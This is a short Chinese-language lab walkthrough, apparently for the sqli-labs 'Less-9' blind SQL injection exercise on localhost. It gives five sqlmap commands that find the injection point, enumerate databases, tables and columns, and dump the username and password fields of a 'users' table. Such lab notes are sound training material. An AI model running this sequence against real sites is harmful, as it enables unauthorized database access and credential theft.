1.查找注入点
sqlmap.py -u http://localhost/sqli/Less-9/?id=1
2.存在时间盲注和布尔盲注,然后爆破数据库名
sqlmap.py -u http://localhost/sqli/Less-9/?id=1 –dbs
3.爆破表
sqlmap.py -u http://localhost/sqli/Less-9/?id=1 -D security –tables
4.爆破列
sqlmap.py -u http://localhost/sqli/Less-9/?id=1 -D security -T users
–columns
5.爆破字段中的值
sqlmap.py -u http://localhost/sqli/Less-9/?id=1 -D security -T users
-C username,password –dump